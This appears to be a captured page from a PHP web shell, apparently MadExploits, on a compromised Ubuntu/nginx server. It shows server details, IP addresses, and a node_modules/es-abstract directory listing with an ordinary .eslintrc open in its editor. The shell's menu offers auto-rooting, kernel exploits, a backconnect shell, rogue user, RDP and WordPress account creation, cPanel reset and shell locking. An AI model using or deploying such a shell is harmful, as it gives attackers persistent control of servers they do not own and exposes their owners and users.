Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
2015
[ DIR ]
dr-xr-xr-x
2016
[ DIR ]
dr-xr-xr-x
2017
[ DIR ]
dr-xr-xr-x
2018
[ DIR ]
dr-xr-xr-x
2019
[ DIR ]
dr-xr-xr-x
2020
[ DIR ]
dr-xr-xr-x
2021
[ DIR ]
dr-xr-xr-x
2022
[ DIR ]
dr-xr-xr-x
2023
[ DIR ]
dr-xr-xr-x
2024
[ DIR ]
dr-xr-xr-x
5
[ DIR ]
dr-xr-xr-x
helpers
[ DIR ]
dr-xr-xr-x
operations
[ DIR ]
dr-xr-xr-x
.editorconfig
312
B
-rw-rw-rw-
.eslintrc
1.71
KB
-rw-rw-rw-
.nycrc
312
B
-rw-rw-rw-
CHANGELOG.md
41.04
KB
-rw-rw-rw-
GetIntrinsic.js
89
B
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
1.89
KB
-rw-rw-rw-
es2015.js
6.88
KB
-rw-rw-rw-
es2016.js
7.27
KB
-rw-rw-rw-
es2017.js
7.71
KB
-rw-rw-rw-
es2018.js
8.33
KB
-rw-rw-rw-
es2019.js
8.58
KB
-rw-rw-rw-
es2020.js
9.84
KB
-rw-rw-rw-
es2021.js
10.69
KB
-rw-rw-rw-
es2022.js
11.44
KB
-rw-rw-rw-
es2023.js
11.94
KB
-rw-rw-rw-
es2024.js
13.14
KB
-rw-rw-rw-
es5.js
2.02
KB
-rw-rw-rw-
es6.js
53
B
-rw-rw-rw-
es7.js
53
B
-rw-rw-rw-
index.js
784
B
-rw-rw-rw-
package.json
4.81
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc
{ "root": true, "extends": "@ljharb", "env": { "es6": true, }, "rules": { "array-bracket-newline": 0, "complexity": 0, "eqeqeq": [2, "allow-null"], "func-name-matching": 0, "id-length": [2, { "min": 1, "max": 40 }], "max-params": [2, 5], "max-lines-per-function": 1, "max-statements": 1, "max-statements-per-line": [2, { "max": 2 }], "multiline-comment-style": 0, "no-magic-numbers": 0, "new-cap": 0, "no-extra-parens": 1, "sort-keys": 0, }, "overrides": [ { "files": "GetIntrinsic.js", "rules": { "max-statements": 0, } }, { "files": "operations/*", "rules": { "max-lines": 0, }, }, { "files": [ "operations/deltas.js", "operations/getOps.js", "operations/spackle.js", "operations/years.js", ], "extends": "@ljharb/eslint-config/node/latest", "rules": { "complexity": 0, "func-style": 0, "max-lines-per-function": 0, "max-nested-callbacks": 0, "max-statements": 0, "no-magic-numbers": 0, "no-throw-literal": 0, }, }, { "files": "test/**", "extends": "@ljharb/eslint-config/tests", "rules": { "max-len": 0, "max-lines-per-function": 0, "no-implicit-coercion": 0, "no-invalid-this": 1, "prefer-promise-reject-errors": 0, }, }, { "files": [ "*/Num*ToRawBytes.js", "*/RawBytesToNum*.js", "helpers/bytesAs*.js", "helpers/valueToFloat*.js", ], "rules": { "max-lines-per-function": "off", "max-statements": "off", "no-redeclare": "warn", "operator-linebreak": [2, "before", { "overrides": { "=": "none" } }], }, }, { "files": "./*/GetSubstitution.js", "rules": { "max-depth": "off", }, }, ], }
Close